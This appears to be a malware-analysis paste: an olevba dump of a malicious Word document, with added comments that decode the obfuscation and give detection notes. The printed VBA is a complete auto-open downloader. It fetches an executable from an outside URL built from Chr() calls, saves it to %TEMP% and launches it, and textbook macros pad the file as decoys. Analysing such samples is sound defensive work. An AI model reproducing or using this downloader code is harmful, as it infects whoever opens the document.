dynamoo

Malicious Word macro

Jun 15th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 291722~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 291722~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 291722~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
Sub A121212121212(FFFFF As Long)
' Stage 1 of the autoopen chain: nothing but a pass-through to
' Module3.knGjLBTgmGgBh (download, drop, launch). The FFFFF argument is
' never read; the extra hop and the unused parameter only add distance
' between the AutoOpen trigger and the code that does the work.
 
knGjLBTgmGgBh
 
End Sub
  21.  
Sub autoopen()
' Auto-exec entry point (flagged AutoExec / AutoOpen in the ANALYSIS table
' below): Word runs this procedure when the document is opened with macros
' enabled, so opening the file is enough to start the chain
' autoopen -> A121212121212 -> Module3.knGjLBTgmGgBh. Blocking macros in
' documents from untrusted sources stops the chain at this line.
 
A121212121212 (3)
 
End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43.  
Dim currCell As String  ' Module-level variable for "Listing 7.4", which is not included in this module; nothing in the dumped code reads or writes it
  45.  
' Listing 7.1. Toggles the active window's gridlines on and off.
' Textbook-style filler: nothing in the autoopen chain calls it.
' NOTE(review): the characters "ù" and "à" in front of .DisplayGridLines are
' not valid VBA, so as dumped this line would not compile; whether they are
' junk bytes in the module or a dump artifact cannot be told from here.
'
Sub ToggleGridlines()
 
    With ActiveWindow
       ù.DisplayGridLines = Not à.DisplayGridLines
    End With
   
End Sub
  55.  
' Listing 7.2. A procedure that tests the Evaluate function: reads a column
' letter from A1 and a row number from B1 on the "Test Data" sheet, joins
' them into a cell address and shows that cell's evaluated value in a MsgBox.
' Textbook-style filler: nothing in the autoopen chain calls it.
' NOTE(review): "þ", "è" and "ð" before .Worksheets, .[A1], .[B1] and
' .Evaluate are not valid VBA, so this procedure cannot compile as dumped.
'
Sub EvaluateTest()
    Dim columnLetter As String
    Dim rowNumber As String
    Dim cellAddress As String
    '
   ' Activate the "Test Data" worksheet
   '
   þ.Worksheets("Test Data").Activate
    '
   ' Get the value in cell A1
   '
   columnLetter = è.[A1].Value
    '
   ' Get the value in cell B1
   '
   rowNumber = è.[B1].Value
    '
   ' Concatenate the two values and then display the message
   '
   cellAddress = columnLetter & rowNumber
    MsgBox "The value in cell " & cellAddress & " is " & ð.Evaluate(cellAddress)
End Sub
  80.  
  81.  
Public Function E1hULdfCYKq40(M72YMyUcUWEAf As String)
' Final stage of the autoopen chain. The string "Shell.Application" is pieced
' together from literals and Chr() calls, instantiated through fAQaVGJfCYUL
' (CreateObject), and .Open is invoked on AHmYANL3 - the Module5 global that
' Module3.knGjLBTgmGgBh sets to the path of the dropped file; Shell.Application
' .Open on a file path launches that file. The M72YMyUcUWEAf argument is
' never used, and although declared as a Function nothing is assigned to the
' return value. Only reached from the error handler in knGjLBTgmGgBh.
 Set Z0EcDOINA = fAQaVGJfCYUL("S" & "h" & Chr(101) & Chr(108) & Chr(108) & "." & "A" & "p" & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
Z0EcDOINA.Open (AHmYANL3)
End Function
Public Function fAQaVGJfCYUL(U9ZWOpJrq As String)
' The one CreateObject call shared by Module1 and Module3. Every caller passes
' a ProgID assembled from Chr()/"&" fragments, so the keyword occurs once in
' the project and no ProgID appears in clear text. Detection note: a Word
' macro creating Microsoft.XMLHTTP, WScript.Shell, ADODB.Stream or
' Shell.Application objects is high-signal however the ProgID string was built.
 Set fAQaVGJfCYUL = CreateObject(U9ZWOpJrq)
End Function
Function CalcNetMargin(fixedCosts)
' Returns (Sales - Expenses - fixedCosts) / Sales for the "2000 Budget"
' sheet, where Sales and Expenses are named ranges summed with
' Application.Sum. When totalSales is 0 no value is assigned, so the function
' returns an empty Variant. Textbook-style filler: nothing in the autoopen
' chain calls it.
' NOTE(review): "ï" and "â" before .Worksheets / .Application are not valid
' VBA; the procedure would not compile as dumped.
 
    Dim totalSales
    Dim totalExpenses
   
    With ï.Worksheets("2000 Budget")
        totalSales = ï.Application.Sum(.Range("Sales"))
        totalExpenses = ï.Application.Sum(.Range("Expenses"))
    End With
       
    If totalSales <> 0 Then
        CalcNetMargin = (totalSales - totalExpenses - fixedCosts) / totalSales
    End If
    '
   ' Recalculate whenever the sheet recalculates
   '
   â.Application.Volatile
End Function
  107.  
  108. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  109. ANALYSIS:
  110. +------------+----------------+-----------------------------------------+
  111. | Type       | Keyword        | Description                             |
  112. +------------+----------------+-----------------------------------------+
  113. | Suspicious | Open           | May open a file                         |
  114. | Suspicious | Chr            | May attempt to obfuscate specific       |
  115. |            |                | strings                                 |
  116. | Suspicious | CreateObject   | May create an OLE object                |
  117. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  118. |            |                | may be used to obfuscate strings        |
  119. |            |                | (option --decode to see all)            |
  120. +------------+----------------+-----------------------------------------+
  121. -------------------------------------------------------------------------------
  122. VBA MACRO Module5.bas
  123. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module5'
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125.  
Public AHmYANL3 As String
' Global variable shared across modules: Module3.knGjLBTgmGgBh stores the
' full path of the dropped payload here (%TEMP% plus a Chr()-built file name,
' see that procedure), and Module1.E1hULdfCYKq40 reads it to launch the file.
  128.  
  129. ' Listing 8.1. This procedure ties everything together by
  130. ' calling each of the code listings individually.
  131. '
  132. Sub Main()
  133.     '
  134.    ' Create the presentation file
  135.    '
  136.    CreateJugglingPresentation
  137.     '
  138.    ' Add the slides
  139.    '
  140.    AddJugglingSlides
  141.     '
  142.    ' Set up the title page
  143.    '
  144.    SetUpStartPage
  145.     '
  146.    ' Set up the Juggling pages
  147.    '
  148.    '
  149.    ' Save it and then run it
  150.    '
  151.    pres.Save
  152.    
  153. End Sub
  154.  
  155. ' Listing 8.2. This procedure creates a new presentation
  156. ' and then saves it.
  157. '
  158. Sub CreateJugglingPresentation()
  159.    '
  160.    ' If the old one is still open, close it without saving
  161.    '
  162.    For Each p In Presentations
  163.         If p.Name = "Juggling" Then
  164.             p.Saved = True
  165.             p.Close
  166.         End If
  167.     Next p
  168.     '
  169.    ' Create a new Presentation object and store it in pres
  170.    '
  171.    Set pres = Presentations.Add
  172.     pres.SaveAs FileName:="Juggling.ppt"
  173. End Sub
  174.  
  175. ' Listing 8.3. A procedure that adds the slides to the
  176. ' Juggling presentation and formats them.
  177. '
  178. Sub AddJugglingSlides()
  179.     Dim i As Integer
  180.    
  181.     With pres
  182.         With .Slides
  183.          '
  184.         ' Add the opening slide
  185.         '
  186.         .Add(Index:=1, Layout:=ppLayoutTitle).Name = "Opener"
  187.          '
  188.         ' Now add the slides for each step
  189.         '
  190.         For i = 1 To 4
  191.              .Add(Index:=i + 1, Layout:=ppLayoutTitle).Name = "Juggling" & i
  192.          Next i
  193.     End With
  194.     '
  195.    ' Set the background for all the slides
  196.    '
  197.    .SlideMaster.Background.Fill.PresetGradient _
  198.         Style:=msoGradientHorizontal, _
  199.         Variant:=1, _
  200.         PresetGradientType:=msoGradientNightfall
  201.     End With
  202. End Sub
  203.  
' Listing 8.4. A procedure that sets up the text and animation
' settings for the first page of the Juggling presentation: title and
' subtitle are given white bold Arial text, then fly-in animations.
' Textbook-style filler: nothing in the autoopen chain calls it.
' NOTE(review): the "ð" characters before .Color.RGB and before
' shapeTitle/shapeSubTitle.AnimationSettings are not valid VBA, so this
' procedure would not compile as dumped.
'
Sub SetUpStartPage()
    Dim shapeTitle As Shape
    Dim shapeSubTitle As Shape
   
    With pres.Slides("Opener")
        Set shapeTitle = .Shapes(1)     ' The title
       Set shapeSubTitle = .Shapes(2)  ' The subtitle
       '
       ' Add the title text
       '
       With shapeTitle.TextFrame.TextRange
            .Text = "Juggling"
            With .Font
                .Name = "Arial"
                .Size = 44
                .Bold = True
                ð.Color.RGB = RGB(255, 255, 255)
            End With
        End With
        '
       ' Set the title animation
       '
       With ð.shapeTitle.AnimationSettings
            .Animate = True
            .AdvanceMode = ppAdvanceOnTime
            .AdvanceTime = 0
            .TextUnitEffect = ppAnimateByCharacter
            .EntryEffect = ppEffectFlyFromLeft
        End With
        '
       ' Add the subtitle text
       '
       With shapeSubTitle.TextFrame.TextRange
            .Text = "A Step-By-Step Course"
            With .Font
                .Name = "Arial"
                .Size = 36
                .Bold = True
                ð.Color.RGB = RGB(255, 255, 255)
            End With
        End With
        '
       ' Set the subtitle animation
       '
       With ð.shapeSubTitle.AnimationSettings
            .Animate = True
            .AdvanceMode = ppAdvanceOnTime
            .AdvanceTime = 0
            .TextUnitEffect = ppAnimateByWord
            .EntryEffect = ppEffectFlyFromBottom
        End With
    End With
End Sub
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type       | Keyword        | Description                             |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Open           | May open a file                         |
  266. | Suspicious | Run            | May run an executable file or a system  |
  267. |            |                | command                                 |
  268. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  269. |            |                | may be used to obfuscate strings        |
  270. |            |                | (option --decode to see all)            |
  271. +------------+----------------+-----------------------------------------+
  272. -------------------------------------------------------------------------------
  273. VBA MACRO Module3.bas
  274. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module3'
  275. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  276.  
  277. ' Listing 6.1. A procedure that toggles the display of
  278. ' nonprinting characters on and off.
  279. '
  280. Sub ToggleNonprinting()
  281.  
  282.     With ActiveWindow.View
  283.         .ShowAll = Not .ShowAll
  284.     End With
  285.  
  286. End Sub
  287.  
  288.  
  289. ' Listing 6.3. A procedure that moves the Word window
  290. ' into the top left corner of the screen.
  291. '
  292. Sub TopLeftCorner()
  293.     With Application
  294.         If .WindowState <> wdWindowStateMaximize _
  295.             And .WindowState <> wdWindowStateMinimize _
  296.             Then .Move 0, 0
  297.     End With
  298. End Sub
  299.  
  300. ' Listing 6.4. Procedures that create and open
  301. ' a workspace of files.
  302. '
  303. ' CreateWorkspace()
  304. ' Saves the path and filename data of all the
  305. ' open files to the Windows Registry. Before
  306. ' running this procedure, make sure only the
  307. ' files you want in the workspace are open.
  308. '
  309. Sub CreateWorkspace()
  310.     Dim total As Integer
  311.     Dim doc As Document
  312.     Dim i As Integer
  313.     '
  314.    ' Delete the old workspace settings
  315.    ' First, get the total number of files
  316.    '
  317.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  318.     For i = 1 To total
  319.         '
  320.        ' Delete each setting
  321.        '
  322.        DeleteSetting "Word", "Workspace", "Document" & i
  323.     Next 'i
  324.    '
  325.    ' Create the new workspace
  326.    '
  327.    i = 0
  328.     For Each doc In Documents
  329.         '
  330.        ' Make sure it's not a new, unsaved file
  331.        '
  332.        If doc.Path <> "" Then
  333.             '
  334.            ' Use i to create unique setting names
  335.            '
  336.            i = i + 1
  337.             '
  338.            ' Save the FullName (path and filename) to the Registry
  339.            '
  340.            SaveSetting "Word", "Workspace", "Document" & i, doc.FullName
  341.         End If
  342.     Next 'doc
  343.    '
  344.    ' Save tht total number of files
  345.    '
  346.    SaveSetting "Word", "Workspace", "TotalFiles", i
  347. End Sub
Sub knGjLBTgmGgBh()
' Stages 2-3 of the autoopen chain: download a file over HTTP, write it to
' %TEMP%, then hand off to E1hULdfCYKq40 to launch it. Every ProgID, method
' name, URL and path is assembled from Chr()/"&" fragments so that none of
' them appears in clear text; the decoded value is given beside each line.
' Detection notes: winword.exe making an HTTP request to the URL below, a new
' .exe appearing under %TEMP%, and CreateObject/CallByName on
' Microsoft.XMLHTTP, WScript.Shell and ADODB.Stream from a document macro.
 
' Decodes to "Microsoft.XMLHTTP" - an HTTP client object.
Set DhAXmemS278B6 = fAQaVGJfCYUL(Chr(77) & "i" & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
 
' "Open", "GET", then the download URL - decoded (defanged):
' hxxp://www.freewebstuff[.]be/34/44.exe - and False (synchronous request).
CallByName DhAXmemS278B6, "O" & Chr(112) & Chr(101) & Chr(110), Chr(71) & Chr(69) & Chr(84), _
Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(102) & "r" & "e" & Chr(101) & Chr(119) & Chr(101) & Chr(98) & Chr(115) & Chr(116) & Chr(117) & Chr(102) & Chr(102) & Chr(46) & Chr(98) & Chr(101) & Chr(47) & "3" & Chr(52) & Chr(47) & Chr(52) & "4" & Chr(46) & "e" & Chr(120) & Chr(101) _
, False
 
 
' Decodes to "WScript.Shell".
Set VZGc6njbPx6 = fAQaVGJfCYUL("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
 
' "Environment" (VbGet) with "Process" - the process environment collection.
Set gsHD7abC5N3 = CallByName(VZGc6njbPx6, "E" & Chr(110) & Chr(118) & "i" & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, "P" & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & "s")
 
' "TEMP" - the value of %TEMP% for the Word process.
I2fThDFfJ2x = gsHD7abC5N3("T" & Chr(69) & Chr(77) & Chr(80))
 
' Drop path = %TEMP% & "\ginkan86.exe" (decoded), stored in the Module5
' global AHmYANL3 so that E1hULdfCYKq40 can launch it later.
AHmYANL3 = I2fThDFfJ2x & Chr(92) & "g" & Chr(105) & Chr(110) & Chr(107) & Chr(97) & Chr(110) & Chr(56) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim L3eSO44R() As Byte
 
' "Send" (VbMethod) performs the request; "responseBody" (VbGet) returns the
' downloaded bytes, received into the Byte array declared above.
CallByName DhAXmemS278B6, "S" & "e" & Chr(110) & Chr(100), VbMethod
L3eSO44R = CallByName(DhAXmemS278B6, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & "s" & "e" & Chr(66) & "o" & "d" & Chr(121), VbGet)
' Write the bytes to the drop path via ADODB.Stream (see aJbV7hKTsFzE).
aJbV7hKTsFzE L3eSO44R, AHmYANL3
' The launch is reached through the error handler rather than in straight-line
' code: 84 / 0 raises a divide-by-zero at run time, GbzD0F5w calls
' E1hULdfCYKq40 (Shell.Application .Open on the dropped file), and Resume
' jumps to the exit label. The "qXSh3tUIo" argument is ignored by the callee.
On Error GoTo GbzD0F5w
    a = 84 / 0
  On Error GoTo 0
 
YmVz6Pw29BQ:
  Exit Sub
GbzD0F5w:
  E1hULdfCYKq40 ("qXSh3tUIo")
Resume YmVz6Pw29BQ
End Sub
Public Function aJbV7hKTsFzE(bB2ojLbgVtJ As Variant, sliQYqZdLGCmtq As String)
' Stage 3 helper: writes the byte array bB2ojLbgVtJ (the HTTP responseBody
' from knGjLBTgmGgBh) to the file sliQYqZdLGCmtq using an "ADODB.Stream"
' object whose ProgID is pieced together from Chr() calls. .Type = 1 selects a
' binary stream and .savetofile's second argument 2 overwrites an existing
' file. Declared as a Function but nothing is assigned to the return value.
Dim BkUobg5a: Set BkUobg5a = fAQaVGJfCYUL(Chr(65) & "d" & Chr(111) & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & Chr(109))
 
With BkUobg5a
   .Type = 1
    .Open
    .write bB2ojLbgVtJ
    .savetofile sliQYqZdLGCmtq, 2
End With
End Function
  389.  
  390.  
  391.  
  392.  
  393. '
  394. ' OpenWorkspace()
  395. ' Accesses the Registry's workspace settings
  396. ' and then opens each workspace file.
  397. '
  398. Sub OpenWorkspace()
  399.     Dim total As Integer
  400.     Dim i As Integer
  401.     Dim filePath As String
  402.     Dim doc As Document
  403.     Dim fileAlreadyOpen As Boolean
  404.     '
  405.    ' Get the total number of files
  406.    '
  407.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  408.     For i = 1 To total
  409.         '
  410.        ' Get the path and filename
  411.        '
  412.        filePath = GetSetting("Word", "Workspace", "Document" & i)
  413.         '
  414.        ' Make sure the file isn't already open
  415.        '
  416.        fileAlreadyOpen = False
  417.         For Each doc In Documents
  418.             If filePath = doc.FullName Then
  419.                 fileAlreadyOpen = True
  420.                 Exit For
  421.             End If
  422.         Next 'doc
  423.        '
  424.        ' Open it
  425.        '
  426.        If Not fileAlreadyOpen Then
  427.             Documents.Open filePath
  428.         End If
  429.     Next 'i
  430. End Sub
  431.  
  432. Sub TestStylesAddMethod()
  433. Set newStyle = ActiveDocument.Styles.Add("PageTitle", wdStyleTypeParagraph)
  434. With newStyle
  435.     .Font.Bold = True
  436.     .Font.Underline = True
  437.     .Font.Size = 24
  438.     .Font.Name = "Arial"
  439.     .ParagraphFormat.Alignment = wdAlignParagraphCenter
  440.     .ParagraphFormat.SpaceAfter = 12
  441.     .NextParagraphStyle = wdStyleNormal
  442. End With
  443. End Sub
  444.  
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------+-----------------------------------------+
  449. | Type       | Keyword        | Description                             |
  450. +------------+----------------+-----------------------------------------+
  451. | Suspicious | Open           | May open a file                         |
  452. | Suspicious | Windows        | May enumerate application windows (if   |
  453. |            |                | combined with Shell.Application object) |
  454. | Suspicious | Chr            | May attempt to obfuscate specific       |
  455. |            |                | strings                                 |
  456. | Suspicious | SaveToFile     | May create a text file                  |
  457. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  458. |            |                | function calls                          |
  459. | Suspicious | Write          | May write to a file (if combined with   |
  460. |            |                | Open)                                   |
  461. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  462. |            |                | may be used to obfuscate strings        |
  463. |            |                | (option --decode to see all)            |
  464. +------------+----------------+-----------------------------------------+